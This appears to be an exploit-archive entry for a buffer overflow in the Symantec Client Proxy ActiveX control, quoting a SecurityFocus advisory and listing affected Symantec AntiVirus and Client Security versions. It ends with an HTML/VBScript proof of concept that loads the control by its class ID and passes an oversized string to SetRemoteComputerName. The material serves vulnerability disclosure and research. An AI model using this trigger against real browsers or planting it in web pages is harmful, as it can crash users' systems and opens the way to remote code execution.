13 lines
No EOL
911 B
HTML
13 lines
No EOL
911 B
HTML
source: http://www.securityfocus.com/bid/38222/info
|
|
|
|
The Symantec Client Proxy ActiveX control is prone to a buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data.
|
|
|
|
Successful exploits allow remote attackers to execute arbitrary code in the context of the application using the ActiveX control (typically Internet Explorer). Failed exploit attempts will likely result in denial-of-service conditions.
|
|
|
|
The following are vulnerable:
|
|
|
|
Symantec AntiVirus 10.0.x and 10.1.x prior to 10.1 MR9
|
|
Symantec AntiVirus 10.2.x prior to 10.2 MR4
|
|
Symantec Client Security 3.0.x and 3.1.x prior to 3.1 MR9
|
|
|
|
<html> <package><job id='DoneInVBS' debug='false' error='true'> <object classid='clsid:E381F1C0-910E-11D1-AB1E-00A0C90F8F6F' id='target' /> <script language='vbscript'> arg1=String(7188, "A") target.SetRemoteComputerName arg1 </script> </html> |